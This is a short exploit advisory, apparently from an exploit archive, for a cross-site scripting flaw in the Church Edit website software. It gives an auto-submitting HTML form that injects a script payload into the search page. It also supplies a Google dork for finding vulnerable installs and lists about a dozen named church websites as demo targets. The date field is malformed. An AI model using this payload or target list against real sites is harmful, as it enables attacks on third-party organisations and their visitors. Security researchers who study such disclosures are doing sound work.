######################
# Exploit Title : Church Edit Xss Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.churchedit.co.uk/
# Google Dork : "This church website is powered by Church Edit"
# Date: 2016-18-22
# Tested On :windows 7/firefox
######################
# exploit:
# <form name="form1" method="post" action=http://[url]/search.php />
# <input type="hidden" name="searchterm"
value='<script>alert(/xss/)</script>' /> is Your js Code
# </form>
# <script language="javascript">
# setTimeout('form1.submit()', 1);
# </script>
******************************
# Demos :
# www.churchedit.co.uk/
#http://www.churnchurches.co.uk
#http://www.brockenhurstchurch.com
#http://www.grimethorpepentecostalchurch.org.uk
#http://www.christchurchskipton.org.uk
#http://www.allsaints-online.org.uk
#http://stjameswetherby.org.uk
#http://www.emmanuelsouthport.org.uk/
#http://www.westbourneparishchurch.org.uk/
#http://www.hendonparish.org.uk/
#http://www.christchurchepsom.org.uk/
#http://www.greatmalvernpriory.org.uk/
#http://www.emmanuelsouthport.org.uk/
######################
# discovered by : Amir.ght
######################